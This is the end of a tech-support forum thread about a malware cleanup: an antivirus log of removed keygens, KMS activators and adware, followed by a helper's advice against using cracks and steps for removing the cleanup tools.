|E:\Data\Documentos\Programas\Edicion Video\Sony Vegas\SNYMVEENE013\Sony.Vegas.PRO.v12.0.0.486.Multilenguaje.Incl.Keygen.and.Patch-DI\Sony.Products.Multikeygen.v2.2.Keygen.Only.READ.NFO-DI\Keygen.exe|una variante de Win32/Keygen.HU aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Internet Download Manager\IDM.6.25.b.12.kuyhAa\disable_activation.cmd|BAT/HostsChanger.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Keylogger\Keylogger Dowloader\SoftonicDownloader_para_revealer-keylogger.exe|Win32/SoftonicDownloader.A aplicación potencialmente no deseada|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Microsoft Office\Microsoft Office 2010\remokis.iso|Win32/Hidcon.B aplicación potencialmente no segura,Win32/HackKMS.A aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Microsoft Office\Microsoft Office 2013\Microsoft Toolkit 2.4.9 Activar Office 2013\MTK.v2.4.9.rar|una variante de MSIL/HackKMS.G aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Microsoft Project Pro 2010 Espanol\Activador  office 2010\Office 2010 Toolkit.exe|una variante de MSIL/HackKMS.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Nero\Nero 8\Nero Startsmart\Nero.v8.2.8.0_ES.Trial+Keys_leian1306.part1.rar|una variante de Win32/Keygen.DS aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Recuva\rcsetup152.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Sistemas Operativos\Hiren ISO BOOT\Hiren's.BootCD.10.2.rar|una variante de Win32/RemoteAdmin.RemoteExec.AA aplicación potencialmente no segura,está correcto|eliminado|
|E:\Data\Documentos\Programas\Unlocker\Unlocker Downloader\SoftonicDownloader_para_unlocker.exe|Win32/SoftonicDownloader.A aplicación potencialmente no deseada|desinfectado por eliminación|
|F:\rise rajas\Age of Empires II HD\STEAM_APIRAJAS.DLL|una variante de Win32/HackTool.Crack.EN aplicación potencialmente no segura|desinfectado por eliminación|
|G:\UsbFix\Quarantine\H\KGB (4GB).lnk.vir|LNK/Agent.DA troyano|desinfectado por eliminación|
|G:\Windows\AutoKMS\AutoKMS.exe|una variante de MSIL/HackKMS.H aplicación potencialmente no segura|desinfectado por eliminación|

It seems the page has not come up again; I still need to confirm whether it still shuts down suddenly.


#18

OK… let us know how everything goes.


#19

After a while the page has not come up again and it has not shut down unexpectedly; you could say that is solved now.

What virus did it have? Is it possible to know specifically which file infected the PC?

Thank you very much for the help.


#20

On a PC with that number of keygens, plus some adware, it is normal for those errors to occur.

Keep in mind that those keygens, first of all, require disabling the antivirus in order to install them, so they can slip in anything while in use; and besides, they are still programs which, as you can imagine, are not designed to work correctly on a PC, since they are not tested like other kinds of programs, so installing them can lead to errors and even to reformatting.

Also, you do not have a somewhat more suitable antivirus either, since Microsoft's does not have protection as strong as Kaspersky Free, Avast, etc., something you should think about installing, besides, as I say, not using that number of keygens, or you will keep having problems.

To remove the tools used in the disinfection, do the following:

  • Download and run >> Delfix, on your desktop.

  • Double-click to run it. (If you use Windows Vista/7/8/10, right-click and select >> Run as Administrator.)

  • Check only the Remove disinfection tools box.

  • Click Run.

The report (DelFix.txt) will open; save it in case it is needed and close the tool.

If any tool remains, uninstall it from the Windows control panel, and those that are not listed can be deleted directly.


Glad I could help! :+1:


TOPIC SOLVED


#21

This topic was automatically closed 2 days after the last post. New replies are not allowed.